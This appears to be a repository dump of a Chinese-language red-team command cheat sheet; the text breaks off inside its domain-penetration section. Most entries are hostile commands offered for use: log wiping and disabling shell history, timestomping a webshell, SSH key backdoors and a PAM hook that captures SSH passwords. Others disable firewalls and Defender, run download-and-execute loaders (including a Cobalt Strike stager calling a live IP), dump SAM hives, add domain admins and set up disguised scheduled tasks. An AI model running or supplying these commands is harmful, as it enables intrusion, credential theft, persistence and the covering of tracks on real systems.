├── Linux 命令速查.md ├── README.md ├── Windows 命令速查.md ├── images ├── index.jpg └── windows.jpg ├── site ├── 404.html ├── Linux 命令速查 │ └── index.html ├── Windows 命令速查 │ └── index.html ├── css │ ├── atom-dark-one.min.css │ ├── bundle.css │ ├── colors.css │ ├── fonts │ │ ├── kpn-metric-bold.eot │ │ ├── kpn-metric-bold.svg │ │ ├── kpn-metric-bold.ttf │ │ ├── kpn-metric-bold.woff │ │ ├── kpn-metric-light.eot │ │ ├── kpn-metric-light.svg │ │ ├── kpn-metric-light.ttf │ │ ├── kpn-metric-light.woff │ │ ├── kpn-metric-normal.eot │ │ ├── kpn-metric-normal.svg │ │ ├── kpn-metric-normal.ttf │ │ ├── kpn-metric-normal.woff │ │ ├── kpn-metric-semi-bold.eot │ │ ├── kpn-metric-semi-bold.svg │ │ ├── kpn-metric-semi-bold.ttf │ │ ├── kpn-metric-semi-bold.woff │ │ ├── kpn-service-icons.eot │ │ ├── kpn-service-icons.svg │ │ ├── kpn-service-icons.ttf │ │ ├── kpn-service-icons.woff │ │ ├── kpn-ui-icons.eot │ │ ├── kpn-ui-icons.svg │ │ ├── kpn-ui-icons.ttf │ │ └── kpn-ui-icons.woff │ ├── ir-black.min.css │ ├── lxfonts │ │ ├── FontAwesome.otf │ │ ├── LXGWWenKai-Regular.woff │ │ ├── LXGWWenKai.ttf │ │ ├── fontawesome-webfont.eot │ │ ├── fontawesome-webfont.svg │ │ ├── fontawesome-webfont.ttf │ │ ├── fontawesome-webfont.woff │ │ ├── fontawesome-webfont.woff2 │ │ ├── lxgwwenkai-regular-subset-100.woff2 │ │ ├── lxgwwenkai-regular-subset-101.woff2 │ │ ├── lxgwwenkai-regular-subset-102.woff2 │ │ ├── lxgwwenkai-regular-subset-103.woff2 │ │ ├── lxgwwenkai-regular-subset-104.woff2 │ │ ├── lxgwwenkai-regular-subset-105.woff2 │ │ ├── lxgwwenkai-regular-subset-106.woff2 │ │ ├── lxgwwenkai-regular-subset-107.woff2 │ │ ├── lxgwwenkai-regular-subset-108.woff2 │ │ ├── lxgwwenkai-regular-subset-109.woff2 │ │ ├── lxgwwenkai-regular-subset-110.woff2 │ │ ├── lxgwwenkai-regular-subset-111.woff2 │ │ ├── lxgwwenkai-regular-subset-112.woff2 │ │ ├── lxgwwenkai-regular-subset-113.woff2 │ │ ├── lxgwwenkai-regular-subset-114.woff2 │ │ ├── lxgwwenkai-regular-subset-115.woff2 │ │ ├── lxgwwenkai-regular-subset-116.woff2 │ │ ├── lxgwwenkai-regular-subset-117.woff2 │ │ ├── lxgwwenkai-regular-subset-118.woff2 │ │ ├── lxgwwenkai-regular-subset-119.woff2 │ │ ├── lxgwwenkai-regular-subset-21.woff2 │ │ ├── lxgwwenkai-regular-subset-23.woff2 │ │ ├── lxgwwenkai-regular-subset-24.woff2 │ │ ├── lxgwwenkai-regular-subset-25.woff2 │ │ ├── lxgwwenkai-regular-subset-26.woff2 │ │ ├── lxgwwenkai-regular-subset-27.woff2 │ │ ├── lxgwwenkai-regular-subset-28.woff2 │ │ ├── lxgwwenkai-regular-subset-29.woff2 │ │ ├── lxgwwenkai-regular-subset-30.woff2 │ │ ├── lxgwwenkai-regular-subset-31.woff2 │ │ ├── lxgwwenkai-regular-subset-32.woff2 │ │ ├── lxgwwenkai-regular-subset-33.woff2 │ │ ├── lxgwwenkai-regular-subset-34.woff2 │ │ ├── lxgwwenkai-regular-subset-35.woff2 │ │ ├── lxgwwenkai-regular-subset-36.woff2 │ │ ├── lxgwwenkai-regular-subset-37.woff2 │ │ ├── lxgwwenkai-regular-subset-38.woff2 │ │ ├── lxgwwenkai-regular-subset-39.woff2 │ │ ├── lxgwwenkai-regular-subset-4.woff2 │ │ ├── lxgwwenkai-regular-subset-40.woff2 │ │ ├── lxgwwenkai-regular-subset-41.woff2 │ │ ├── lxgwwenkai-regular-subset-42.woff2 │ │ ├── lxgwwenkai-regular-subset-43.woff2 │ │ ├── lxgwwenkai-regular-subset-44.woff2 │ │ ├── lxgwwenkai-regular-subset-45.woff2 │ │ ├── lxgwwenkai-regular-subset-46.woff2 │ │ ├── lxgwwenkai-regular-subset-47.woff2 │ │ ├── lxgwwenkai-regular-subset-48.woff2 │ │ ├── lxgwwenkai-regular-subset-49.woff2 │ │ ├── lxgwwenkai-regular-subset-5.woff2 │ │ ├── lxgwwenkai-regular-subset-50.woff2 │ │ ├── lxgwwenkai-regular-subset-51.woff2 │ │ ├── lxgwwenkai-regular-subset-52.woff2 │ │ ├── lxgwwenkai-regular-subset-53.woff2 │ │ ├── lxgwwenkai-regular-subset-54.woff2 │ │ ├── lxgwwenkai-regular-subset-55.woff2 │ │ ├── lxgwwenkai-regular-subset-56.woff2 │ │ ├── lxgwwenkai-regular-subset-57.woff2 │ │ ├── lxgwwenkai-regular-subset-58.woff2 │ │ ├── lxgwwenkai-regular-subset-59.woff2 │ │ ├── lxgwwenkai-regular-subset-6.woff2 │ │ ├── lxgwwenkai-regular-subset-60.woff2 │ │ ├── lxgwwenkai-regular-subset-61.woff2 │ │ ├── lxgwwenkai-regular-subset-62.woff2 │ │ ├── lxgwwenkai-regular-subset-63.woff2 │ │ ├── lxgwwenkai-regular-subset-64.woff2 │ │ ├── lxgwwenkai-regular-subset-65.woff2 │ │ ├── lxgwwenkai-regular-subset-66.woff2 │ │ ├── lxgwwenkai-regular-subset-67.woff2 │ │ ├── lxgwwenkai-regular-subset-68.woff2 │ │ ├── lxgwwenkai-regular-subset-69.woff2 │ │ ├── lxgwwenkai-regular-subset-70.woff2 │ │ ├── lxgwwenkai-regular-subset-71.woff2 │ │ ├── lxgwwenkai-regular-subset-72.woff2 │ │ ├── lxgwwenkai-regular-subset-73.woff2 │ │ ├── lxgwwenkai-regular-subset-74.woff2 │ │ ├── lxgwwenkai-regular-subset-75.woff2 │ │ ├── lxgwwenkai-regular-subset-76.woff2 │ │ ├── lxgwwenkai-regular-subset-77.woff2 │ │ ├── lxgwwenkai-regular-subset-78.woff2 │ │ ├── lxgwwenkai-regular-subset-79.woff2 │ │ ├── lxgwwenkai-regular-subset-80.woff2 │ │ ├── lxgwwenkai-regular-subset-81.woff2 │ │ ├── lxgwwenkai-regular-subset-82.woff2 │ │ ├── lxgwwenkai-regular-subset-83.woff2 │ │ ├── lxgwwenkai-regular-subset-84.woff2 │ │ ├── lxgwwenkai-regular-subset-85.woff2 │ │ ├── lxgwwenkai-regular-subset-86.woff2 │ │ ├── lxgwwenkai-regular-subset-87.woff2 │ │ ├── lxgwwenkai-regular-subset-88.woff2 │ │ ├── lxgwwenkai-regular-subset-89.woff2 │ │ ├── lxgwwenkai-regular-subset-90.woff2 │ │ ├── lxgwwenkai-regular-subset-91.woff2 │ │ ├── lxgwwenkai-regular-subset-97.woff2 │ │ ├── lxgwwenkai-regular-subset-98.woff2 │ │ └── lxgwwenkai-regular-subset-99.woff2 │ ├── lxgwwenkai-regular.css │ └── theme.css ├── fonts │ ├── kpn-metric-bold.eot │ ├── kpn-metric-bold.svg │ ├── kpn-metric-bold.ttf │ ├── kpn-metric-bold.woff │ ├── kpn-metric-light.eot │ ├── kpn-metric-light.svg │ ├── kpn-metric-light.ttf │ ├── kpn-metric-light.woff │ ├── kpn-metric-normal.eot │ ├── kpn-metric-normal.svg │ ├── kpn-metric-normal.ttf │ ├── kpn-metric-normal.woff │ ├── kpn-metric-semi-bold.eot │ ├── kpn-metric-semi-bold.svg │ ├── kpn-metric-semi-bold.ttf │ ├── kpn-metric-semi-bold.woff │ ├── kpn-service-icons.eot │ ├── kpn-service-icons.svg │ ├── kpn-service-icons.ttf │ ├── kpn-service-icons.woff │ ├── kpn-ui-icons.eot │ ├── kpn-ui-icons.svg │ ├── kpn-ui-icons.ttf │ └── kpn-ui-icons.woff ├── img │ ├── favicon.ico │ ├── git-icon-black.png │ ├── git.svg │ ├── logo-bitbucket.svg │ ├── logo-gitea.svg │ ├── logo-github.svg │ ├── logo-gitlab.svg │ ├── logo-kpn.png │ ├── logo-kpn.svg │ ├── logo.svg │ └── ui-bulb.svg ├── index.html ├── js │ ├── detail.js │ ├── highlight.min.js │ ├── languages │ │ ├── asciidoc.min.js │ │ ├── groovy.min.js │ │ └── nix.min.js │ ├── mermaid.min.js │ └── theme.js ├── search.html ├── search │ ├── lunr.js │ ├── main.js │ ├── search_index.json │ └── worker.js ├── sitemap.xml ├── 工具使用命令速查 │ ├── mimikatz │ │ └── index.html │ ├── proxy │ │ └── index.html │ └── 后渗透工具列表 │ │ └── index.html └── 数据库命令速查 │ ├── Oracle │ └── index.html │ ├── mysql │ └── index.html │ ├── myssql │ └── index.html │ └── postgresql │ └── index.html ├── 工具使用命令速查 ├── mimikatz.md ├── proxy.md └── 后渗透工具列表.md └── 数据库命令速查 ├── Oracle.md ├── mysql.md ├── myssql.md └── postgresql.md /Linux 命令速查.md: -------------------------------------------------------------------------------- 1 | # Linux 命令速查 2 | 3 | ## 本次不记录命令 4 | 5 | ``` 6 | unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0 7 | ``` 8 | 9 | ## 常用日志清理 10 | 11 | ``` 12 | echo > /var/log/btmp;echo > /var/log/wtmp;echo > /var/log/lastlog;echo > /var/log/utmp;echo > /var/log/syslog;cat /dev/null > /var/log/secure;cat /dev/null > /var/log/message;echo ok 13 | ``` 14 | 15 | 16 | - /var/log/btmp 记录所有登录失败信息,使用lastb命令查看 17 | - /var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看 18 | - /var/log/wtmp 记录所有用户的登录、注销信息,使用last命令查看 19 | - /var/log/utmp 记录当前已经登录的用户信息,使用w,who,users等命令查看 20 | - /var/log/secure 记录与安全相关的日志信息 21 | - /var/log/message 记录系统启动后的信息和错误日志 22 | 23 | ## Web 日志清理 24 | 25 | ``` 26 | 直接替换日志ip地址: 27 | sed -i 's/127.0.0.1/192.168.1.1/g' access.log 28 | 29 | 清除部分相关日志: 30 | 使用grep -v来把相关信息删除: 31 | cat /var/log/nginx/access.log | grep -v evil.php > tmp.log 32 | 33 | 把修改过的日志覆盖到原日志文件: 34 | cat tmp.log > /var/log/nginx/access.log 35 | ``` 36 | 37 | 38 | ## 设置终端代理 39 | 40 | ``` 41 | export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890 42 | ``` 43 | 44 | ## 查看用户登录记录 45 | 46 | ``` 47 | last 48 | ``` 49 | 50 | ## root 权限创建管理员用户 51 | 52 | ``` 53 | sudo useradd -m testt && echo "testt:admin@123" | sudo chpasswd && sudo usermod -aG wheel testt 54 | ``` 55 | 56 | ## cURL/wget 下载文件 57 | 58 | ``` 59 | wget -P /tmp/ http://x.x.x.x:8080/shell 60 | curl -o /tmp/xxx http://x.x.x.x:8080/shell 61 | ``` 62 | 63 | ## curl/wget 发送文件 64 | 65 | ```bash 66 | curl -X POST --data-binary @file.txt http://localhost:9000 67 | 68 | wget --post-file=file.txt http://localhost:9000 69 | 70 | curl -T file.txt http://localhost:9000 71 | ``` 72 | 73 | ```python 74 | import socket 75 | 76 | def start_server(host, port, buffer_size=1024): 77 | server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 78 | server_socket.bind((host, port)) 79 | server_socket.listen(5) 80 | print(f"服务器正在 {host}:{port} 监听...") 81 | 82 | while True: 83 | client_socket, addr = server_socket.accept() 84 | print(f"连接来自 {addr}") 85 | 86 | # 读取HTTP请求头 87 | request = b"" 88 | while b"\r\n\r\n" not in request: 89 | request += client_socket.recv(buffer_size) 90 | 91 | headers, file_data = request.split(b"\r\n\r\n", 1) 92 | 93 | # 提取文件名(可以根据实际需求修改提取方式) 94 | file_name = "received_file" # 默认文件名 95 | 96 | # 保存文件 97 | with open(file_name, 'wb') as f: 98 | f.write(file_data) 99 | while True: 100 | data = client_socket.recv(buffer_size) 101 | if not data: 102 | break 103 | f.write(data) 104 | 105 | print(f"文件 {file_name} 已保存") 106 | client_socket.close() 107 | 108 | if __name__ == "__main__": 109 | HOST = '0.0.0.0' 110 | PORT = 9000 111 | start_server(HOST, PORT) 112 | ``` 113 | 114 | ## 文件时间修改 115 | 116 | > 修改 /www/wwwroot/shell.php 时间为 2024.05.16.24 117 | 118 | ``` 119 | touch -t 202405161200.24 /www/wwwroot/shell.php 120 | ``` 121 | 122 | ## 查看 DNS 服务器 123 | 124 | ``` 125 | cat /etc/resolv.conf 126 | ``` 127 | 128 | ## 停止防火墙 129 | 130 | ``` 131 | systemctl stop firewalld 132 | service iptables stop 133 | 134 | ubuntu: 135 | ufw disable 136 | ``` 137 | 138 | ## 搜索敏感信息 139 | 140 | ``` 141 | find / -regex ".*\.properties\|.*\.conf\|.*\.config\|.*\.yaml\|.*\.sh|.*\.jsp|.*\.log|.*\.txt|.*\.xml" | xargs grep -E "=jdbc:|pass=|passwd=|aliyun|password" 142 | ``` 143 | 144 | ## echo 写文件 145 | 146 | ``` 147 | //直接 echo 写入: 148 | echo xxx > /www/xxx.jsp 149 | 150 | //base64 写入: 151 | echo eHh4ZGFzMQ== | base64 -d > /www/xxx.jsp 152 | 153 | //追加 154 | echo xxx >> /www/xxx.jsp 155 | ``` 156 | 157 | 在线编码:https://forum.ywhack.com/coding.php 158 | 159 | ## 写入 ssh 公钥: 160 | 161 | ``` 162 | echo c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFEazRVTjhFUTFXOFBWMQ== | base64 -d > authorized_keys 163 | ``` 164 | 165 | ``` 166 | //使用 printf 在末尾处插入,如需换行可添加\n 167 | //参考https://baijiahao.baidu.com/s?id=1727019063436737118&wfr=spider&for=pc 168 | 169 | printf "ssh-rsa xxx" >> /root/.ssh/authorized_keys 170 | ``` 171 | 172 | ## 压缩打包文件 173 | 174 | ``` 175 | //将 /home/mail /home/web 两个目录打包至 /tmp 目录下命名为web.tar.gz 176 | tar czvf /tmp/web.tar.gz /home/mail /home/web 177 | 178 | //zip 179 | zip -r /tmp/web.zip /home/mail /home/web 180 | 181 | //可使用 -x 排除,如: 182 | zip -r /tmp/web.zip /home/mail /home/web -x /home/mail/test.txt -x /home/web/log/* 183 | ``` 184 | 185 | ## 分割上传 186 | 187 | ``` 188 | split -n 3 fscan //分割为 3 个文件 189 | split -b 500k fscan //以 500 K 大小分割 fscan 190 | 191 | Windows 合并: 192 | copy /b xaa+xab fscan 193 | type xaa xab > fscan 194 | 195 | Linux 合并: 196 | cat xaa xab > fscan 197 | ``` 198 | 199 | ## 十六进制获取文件 200 | 201 | ``` 202 | # 将文件转换为十六进制 203 | xxd -p filename 204 | ``` 205 | 206 | ``` 207 | # 本地还原: 208 | xxd -p -r filename > aa.tar.gz 209 | ``` 210 | 211 | ## pam_exec 抓 SSH 密码 212 | 213 | 需要关闭 SELinux: 214 | ``` 215 | setenforce 0 # 关闭 216 | setenforce 1 # 开启 217 | ``` 218 | 219 | 修改 `/etc/pam.d/sshd` 第一行添加: 220 | 221 | ``` 222 | auth optional pam_exec.so quiet expose_authtok /tmp/sshd.sh 223 | ``` 224 | 225 | /tmp/sshd.sh: 226 | 227 | > `chmod 777 /tmp/sshd.sh` 228 | 229 | ```bash 230 | #!/bin/sh 231 | 232 | echo "$(date) $PAM_USER $(cat -) $PAM_RHOST $PAM_RUSER" >> /tmp/123.log 233 | ``` 234 | 235 | 236 | ## Debian/Ubuntu Docker 安装 237 | 238 | > Debian 12 / Ubuntu 24.04 安装 Docker 以及 Docker Compose 239 | 240 | **安装一些必要的软件包** 241 | 242 | ``` 243 | apt update 244 | apt upgrade -y 245 | apt install curl vim wget gnupg dpkg apt-transport-https lsb-release ca-certificates 246 | ``` 247 | 248 | **加入 Docker 的 GPG 公钥和 apt 源** 249 | 250 | ``` 251 | Debian: 252 | curl -sSL https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg 253 | echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://download.docker.com/linux/debian $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list 254 | 255 | Ubuntu: 256 | curl -sSL https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg 257 | echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list 258 | ``` 259 | 260 | 国内机器可以用清华 TUNA 的国内源: 261 | 262 | ``` 263 | Debian: 264 | curl -sS https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg 265 | echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list 266 | 267 | Ubuntu: 268 | curl -sS https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg 269 | echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list 270 | ``` 271 | 272 | 然后更新系统后即可安装 Docker CE 和 Docker Compose 插件 273 | 274 | ``` 275 | apt update 276 | apt install docker-ce docker-ce-cli containerd.io docker-compose-plugin 277 | 278 | ``` 279 | 280 | **安装 Docker Compose** 281 | 282 | ``` 283 | curl -L https://github.com/docker/compose/releases/latest/download/docker-compose-Linux-x86_64 > /usr/local/bin/docker-compose 284 | chmod +x /usr/local/bin/docker-compose 285 | 286 | ``` 287 | 288 | ## JDK 安装 289 | 290 | ``` 291 | ubuntu18运行 292 | sudo apt install openjdk-11-jre-headless 293 | sudo apt install openjdk-11-jdk 294 | ``` 295 | 296 | ``` 297 | 手动 298 | tar -xzvf jdk-13.0.2_linux-x64_bin.tar.gz 299 | cd jdk-13.0.2/ 300 | pwd 301 | vim /etc/profile 302 | 303 | export JAVA_HOME=/root/jdk-13.0.2 304 | export CLASSPATH=$:CLASSPATH:$JAVA_HOME/lib/ export PATH=$PATH:$JAVA_HOME/bin 305 | 306 | source /etc/profile 307 | ``` -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 介绍 2 | 3 | 红队命令速查 是由棱角社区`(Edge Forum)` 整理的关于 `Red Team` 期间所常使用的一些基础命令。 4 | 5 | 在线访问地址:https://forum.ywhack.com/command/ 6 | 7 | ``` 8 | '''+ Edge Team +''' 9 | 10 | 11 | __ _ __ ___ 12 | |_ _|(_| _ (_ _ _ __ o _|_ \/ | _ _ __ 13 | |__(_|__|(/_ __)(/_(_ |_| | | |_ / | (/_(_|||| 14 | ``` 15 | 16 | ## 目录 17 | 18 | - [Linux 命令速查](Linux%20命令速查.md) 19 | - [Windows 命令速查](Windows%20命令速查.md) 20 | - Tools 命令速查 21 | - [mimikatz](工具使用命令速查/mimikatz.md) 22 | - [proxy tools](工具使用命令速查/proxy.md) 23 | - [后渗透工具列表](工具使用命令速查/后渗透工具列表.md) 24 | - cobaltstrike 25 | - 数据库命令速查 26 | - [mysql](数据库命令速查/mysql.md) 27 | - [sql server](数据库命令速查/myssql.md) 28 | - [oracle](数据库命令速查/Oracle.md) 29 | - [postgresql](数据库命令速查/postgresql.md) 30 | - elasticsearch 31 | 32 | ## 本地部署 33 | 34 | ``` 35 | git clone https://github.com/EdgeSecurityTeam/command.git 36 | cd command 37 | python3 -m http.server 8082 38 | http://localhost:8082/site/ 39 | ``` 40 | 41 | ## Demo 42 | 43 | ![file](images/index.jpg) 44 | 45 | ![file](images/windows.jpg) 46 | 47 | ## 感谢 48 | --------- 49 | > 以下排名不分先后! 50 | 51 | - @loid 52 | - @r0exper 53 | - @路人甲 54 | - @Upcorn 55 | - @cxaqhq 56 | -------------------------------------------------------------------------------- /Windows 命令速查.md: -------------------------------------------------------------------------------- 1 | # Windows 命令速查 2 | 3 | ## TCP 出网探测 4 | 5 | ``` 6 | powershell Test-NetConnection -ComputerName [目标主机名或IP] -Port [端口号] 7 | ``` 8 | 9 | ## 远程下载文件 10 | 11 | ### certutil 12 | 13 | ``` 14 | certutil.exe -urlcache -split -f "http://127.0.0.1:8080/file.exe" "C:/Windows/temp/file.exe" 15 | 16 | //从 http://127.0.0.1:8080/ 下载 file.exe 并保存到 C:/Windows/temp/file.exe 17 | ``` 18 | 19 | ### PowerShell 20 | 21 | ``` 22 | powershell -Command "Invoke-WebRequest -Uri 'https://www.example.com/file.zip' -OutFile 'C:\Downloads\file.zip'" 23 | ``` 24 | 25 | ### BitsAdmin 26 | 27 | ``` 28 | bitsadmin /transfer "JobName" /download /priority normal https://www.example.com/file.zip C:\path\to\save\file.zip 29 | ``` 30 | 31 | ### rundll32 32 | 33 | ``` 34 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.3.150/chfs/shared/1Z3.exe",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} 35 | ``` 36 | 37 | ## IIS 网站查询 38 | 39 | > 查看 IIS 绑定的网站: 40 | 41 | ``` 42 | %windir%\system32\inetsrv\appcmd.exe list sites 43 | ``` 44 | 45 | > 查看 Site ID 为 1 的物理路径: 46 | 47 | ``` 48 | %windir%\system32\inetsrv\appcmd list site /site.id:1 /config | findstr "physicalPath" 49 | ``` 50 | 51 | > IIS 配置文件: 52 | 53 | ``` 54 | C:\Windows\System32\inetsrv\config\applicationHost.config 55 | %SystemRoot%\System32\inetsrv\config\applicationHost.config 56 | ``` 57 | 58 | ## 查看 Windows 系统版本: 59 | 60 | ``` 61 | wmic os get Caption,osarchitecture 62 | ``` 63 | 64 | ## 修改文件时间 65 | 66 | ``` 67 | powershell -command "(Get-Item 'C:\path\to\your\file.txt').CreationTime = '2024-01-01 12:00 AM'; (Get-Item 'C:\path\to\your\file.txt').LastWriteTime = '2024-01-02 12:00 AM'" 68 | ``` 69 | 70 | ## 进程操作 71 | 72 | > 查看端口对应 PID: 73 | ``` 74 | netstat -ano | findstr :80 75 | ``` 76 | 77 | > 查看 PID 对应程序: 78 | 79 | ``` 80 | tasklist /FI "PID eq 1234" 81 | ``` 82 | 83 | > 根据 PID 查看程序所在目录: 84 | 85 | ``` 86 | wmic process where ProcessId=1234 get ExecutablePath 87 | ``` 88 | 89 | > 执行进程: 90 | 91 | ``` 92 | start /b xxx.exe 93 | ``` 94 | 95 | > 根据名称结束进程: 96 | ``` 97 | taskkill /f /t /im GotoHTTP.exe 98 | ``` 99 | > 搜索进程 100 | ``` 101 | tasklist | findstr "powershell" 102 | ``` 103 | 104 | ## Powershell 无窗口执行 EXE 105 | 106 | ``` 107 | powershell -executionPolicy bypass Start-Process -WindowStyle hidden -FilePath 'C:/Windows/temp/rd.exe' 108 | ``` 109 | 110 | ## net 命令 111 | 112 | ``` 113 | 查看用户列表: net user 114 | powershell查看用户列表: Get-WmiObject -Class Win32_UserAccount 115 | 查看用户组列表: net localgroup 116 | 查看管理组列表: net localgroup Administrators 117 | 添加用户并设置密码: net user test P@ssw0rd /add 118 | 将用户加入管理组: net localgroup Administrators test /add 119 | 将用户加入桌面组: net localgroup "Remote Desktop Users" guest /add 120 | 激活guest用户: net user guest /active:yes 121 | 更改guest用户的密码: net user guest P@ssw0rd 122 | 将用户加入管理组: net localgroup administrators guest /add 123 | 将用户加入桌面组: net localgroup "Remote Desktop Users" guest /add 124 | 查看本地密码策略: net accounts 125 | 查看当前会话: net session 126 | 建立IPC会话: net use \\127.0.0.1\c$ "P@ssw0rd" /user:"domain\Administrator" 127 | ``` 128 | 129 | ## netsh 操作防火墙 130 | 131 | - 查看防火墙配置: 132 | 133 | ``` 134 | netsh firewall show config 135 | ``` 136 | 137 | - Windows Server 2003 及之前的版本,允许指定程序全部连接 138 | 139 | ``` 140 | netsh firewall add allowedprogram C:\nc.exe "allow nc" enable 141 | ``` 142 | 143 | - Windows Server 2003之后的版本 144 | 145 | ``` 146 | netsh advfirewall firewall add rule name="pass nc" dir in action=allow program="C:\nc.exe 147 | ``` 148 | 149 | - 允许3389放行 150 | 151 | ``` 152 | netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow 153 | ``` 154 | 155 | ## WIndows Defender 加白排除目录: 156 | 157 | ``` 158 | C:\Windows\System32\wbem\wmic.exe /Node:localhost /Namespace:\\Root\Microsoft\Windows\Defender Path MSFT_MpPreference call Add ExclusionPath=C:\ 159 | 160 | powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\test" 161 | ``` 162 | 163 | ## 文件写入 164 | 165 | ``` 166 | echo test > C:\test.txt //写入-覆盖 167 | echo test >> c:\test.txt //追加有换行 168 | set /p=testC:\test.txt //写入 169 | set /p="121d2">>C:\test.txt //不换行追加 170 | 171 | //powershell不换行追加 172 | powershell -Command "[System.IO.File]::AppendAllText('C:\windows\temp\111.txt', 'test')" 173 | 174 | //规避空格 175 | echo.123>>a.txt 176 | echo,123>>a.txt 177 | type;a.txt 178 | 179 | //将base64编码的文件解码写入到 test.jsp 180 | certutil -f -decode base64.txt C:\\test.jsp 181 | 182 | //将十六进制文件解码写入到 test.jsp 183 | certutil -decodehex hex.txt C:\\test.jsp 184 | ``` 185 | 186 | ## 注册表: 187 | 188 | ### Restricted Admin Mode 189 | 190 | ``` 191 | 对应命令行开启 Restricted Admin mode 命令如下: 192 | REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f 193 | 194 | 查看是否已开启 DisableRestrictedAdmin REG_DWORD 0x0 存在就是开启 195 | REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin" 196 | ``` 197 | 198 | ### 查看3389端口 199 | 200 | ``` 201 | REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber 202 | ``` 203 | 204 | > https://forum.ywhack.com/coding.php 端口查询 205 | 206 | ### 开启远程桌面 207 | 208 | ``` 209 | REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 210 | 211 | 或者 212 | 213 | wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 214 | ``` 215 | 216 | ### 导出 SAM 数据库 217 | 218 | ``` 219 | reg save HKLM\SYSTEM sys.hiv 220 | reg save HKLM\SAM sam.hiv 221 | 222 | 复制: 223 | C:\Windows\System32\config\SYSTEM 224 | C:\Windows\System32\config\SAM 225 | 226 | 使用 https://github.com/3gstudent/NinjaCopy 进行复制。 227 | 228 | lsadump::sam /sam:sam.hiv /system:system.hiv 229 | ``` 230 | 231 | ## 查看盘符剩余空间 232 | 233 | ``` 234 | ## 大小为字节磁盘 235 | ::查看C盘 236 | wmic LogicalDisk where "Caption='C:'" get FreeSpace,Size /value 237 | ::查看D盘 238 | wmic LogicalDisk where "Caption='D:'" get FreeSpace,Size /value 239 | ``` 240 | 241 | ## 搜索文件: 242 | 243 | ``` 244 | #搜索 D 盘下名为 shell.jsp 的文件 245 | cd /d D:\ && dir /b /s shell.jsp 246 | 247 | #搜素 D 盘下后缀为 conf 内容且包含 password(不区分大小写): 248 | findstr /s /i /n /d:D:\ "password" *.conf 249 | ``` 250 | 251 | ## CS 上线 252 | 253 | ``` 254 | powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://122.114.55.117:8012/download/upload.ps1') 255 | ``` 256 | 257 | ``` 258 | msiexec /q /i http://127.0.0.1:8080/ms10-051.msi 259 | ``` 260 | 261 | ## 设置文件属性 262 | 263 | ```bash 264 | attrib +s +a +h +r cs.exe // 给文件设置系统文件属性、存档文件属性、隐藏文件属性、只读文件属性 265 | ``` 266 | 267 | ## 计划任务 268 | 269 | ```bash 270 | schtasks /create /ru system /tn "Microsoft\Windows\Multimedia\SystemMediaService" /sc ONSTART /tr "C:\cs.exe" 271 | // 创建一个名为Microsoft\Windows\Multimedia\SystemMediaService,开机时执行 c:\cs.exe 的计 划任务,需要管理员权限 272 | 273 | schtasks /change /tn "Microsoft\Windows\Multimedia\SystemSoundsService" /ru system /tr "C:\cs.exe" /enable 274 | // 修改Microsoft\Windows\Multimedia\SystemSoundsService 计划任务,需要管理员权限, 更改任务无法通过 /sc、/mo 参数更改计划频率 275 | ``` 276 | 277 | ## RDP 凭据 278 | 279 | ``` 280 | #列出所有 RDP 凭证 281 | C:\Users\用户名\AppData\Local\Microsoft\Credentials 282 | 283 | dir /a C:\Users\Administrator\AppData\Local\Microsoft\Credentials 284 | ``` 285 | 286 | ## Windows 打包目录上传文件 287 | 288 | ``` 289 | powershell -Command "Compress-Archive -Path E:\update\ -DestinationPath E:\test.zip" 290 | 291 | 7z.exe a -r -p12345 C:\webs\1.7z C:\webs\ 292 | 293 | zip -r C:\webs\1.zip C:\webs\ 294 | ``` 295 | 296 | ## 域渗透命令 297 | 298 | ``` 299 | whoami /user //查看当前用户权限 300 | net config workstation //可知域名和其他信息 301 | net user /domain //查询域用户 302 | net user edgeuser Admin12345 /add /domain //添加域用户 303 | net group "domain admins" edgeuser /add /domain //添加域管理员 304 | net group "enterprise admins" edgeuser /add /domain //添加企业管理员 305 | net group "domain admins" /domain //查询域管理员用户 306 | net group 